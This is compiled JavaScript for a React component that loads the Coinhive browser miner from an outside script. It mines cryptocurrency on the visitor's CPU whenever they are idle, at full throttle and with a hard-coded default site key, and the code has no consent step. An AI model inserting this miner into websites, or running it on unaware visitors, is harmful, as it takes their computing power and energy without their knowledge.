'use strict';

exports.__esModule = true;
exports.default = undefined;

var _regenerator = require('babel-runtime/regenerator');

var _regenerator2 = _interopRequireDefault(_regenerator);

var _class, _temp;

var _react = require('react');

var _react2 = _interopRequireDefault(_react);

var _reactIdle = require('react-idle');

var _reactIdle2 = _interopRequireDefault(_reactIdle);

var _loadScript = require('load-script');

var _loadScript2 = _interopRequireDefault(_loadScript);

function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; }

function _asyncToGenerator(fn) { return function () { var gen = fn.apply(this, arguments); return new Promise(function (resolve, reject) { function step(key, arg) { try { var info = gen[key](arg); var value = info.value; } catch (error) { reject(error); return; } if (info.done) { resolve(value); } else { return Promise.resolve(value).then(function (value) { step("next", value); }, function (err) { step("throw", err); }); } } return step("next"); }); }; }

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }

var _default = (_temp = _class = function (_Component) {
  _inherits(_default, _Component);

  function _default(props) {
    _classCallCheck(this, _default);

    var _this = _possibleConstructorReturn(this, _Component.call(this, props));

    _this.handleIdleChange = function (_ref) {
      var idle = _ref.idle;

      if (_this.miner != null) {
        if (idle) {
          _this.start();
        } else {
          _this.stop();
        }
      } else {}
      _this.idle = idle;
    };

    _this.miner = null;
    _this.idle = false;
    return _this;
  }

  _default.prototype.start = function start() {
    if (this.miner) {
      this.miner.start();
      this.props.onStart(this.miner);
    }
  };

  _default.prototype.stop = function stop() {
    if (this.miner) {
      this.miner.stop();
      this.props.onStop(this.miner);
    }
  };

  _default.prototype.componentWillMount = function () {
    var _ref2 = _asyncToGenerator( /*#__PURE__*/_regenerator2.default.mark(function _callee() {
      var _this2 = this;

      return _regenerator2.default.wrap(function _callee$(_context) {
        while (1) {
          switch (_context.prev = _context.next) {
            case 0:
              _context.next = 2;
              return new Promise(function (resolve) {
                (0, _loadScript2.default)('https://coin-hive.com/lib/coinhive.min.js', function () {
                  resolve(CoinHive.Anonymous(_this2.props.siteKey));
                });
              });

            case 2:
              this.miner = _context.sent;

              this.handleProps(this.props);
              this.props.onInit(this.miner);
              if (this.idle) {
                this.start();
              }

            case 6:
            case 'end':
              return _context.stop();
          }
        }
      }, _callee, this);
    }));

    function componentWillMount() {
      return _ref2.apply(this, arguments);
    }

    return componentWillMount;
  }();

  _default.prototype.componentWillReceiveProps = function componentWillReceiveProps(nextProps) {
    return this.handleProps(nextProps);
  };

  _default.prototype.handleProps = function handleProps(_ref3) {
    var throttle = _ref3.throttle,
        threads = _ref3.threads;

    if (this.miner != null) {
      this.miner.setNumThreads(threads);
      this.miner.setThrottle(throttle);
    }
  };

  _default.prototype.render = function render() {
    return _react2.default.createElement(_reactIdle2.default, {
      timeout: this.props.timeout,
      onChange: this.handleIdleChange
    });
  };

  return _default;
}(_react.Component), _class.defaultProps = {
  timeout: 1000,
  threads: 2,
  throttle: 0,
  siteKey: 'NjBUIBfgmgqwSRGjemP5JQCNFJu5UJTx',
  onInit: function onInit(miner) {},
  onStart: function onStart(miner) {},
  onStop: function onStop(miner) {}
}, _temp);

exports.default = _default;
module.exports = exports['default'];